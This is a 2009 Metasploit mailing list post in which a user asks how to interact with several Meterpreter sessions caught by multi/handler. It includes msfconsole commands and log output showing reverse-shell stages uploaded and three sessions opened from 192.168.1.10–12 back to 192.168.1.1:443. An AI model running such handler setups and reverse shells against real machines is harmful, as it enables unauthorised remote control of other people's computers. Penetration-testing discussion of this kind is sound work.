Metasploit mailing list archives

multihandler with "ExitOnSession" option false


From: imanilsaini at gmail.com (anil saini)
Date: Tue, 11 Aug 2009 13:17:11 +0000

I m using multi/handler and set the option to  "ExitOnSession=false"
i have executed my payload on three different computers(192.168.1.10-12) and
got the meterpreter sessions. My ip is 192.168.1.1.



But now how do i intrect with these sessions ? The moment i do CtrZ i loose
the msfconsole window. Is these a way to intract  with  these  meterpreter
sessioons?

Please help me.

Thanks

##################################################
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Meterpreter session 1 opened (192.168.1.1:443 -> 192.168.1.10:56457)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.1.1:443 -> 192.168.1.11:39425)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (192.168.1.1:443 -> 192.168.1.12:58693)

#########################################################
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090811/98dffef7/attachment.html>


Current thread: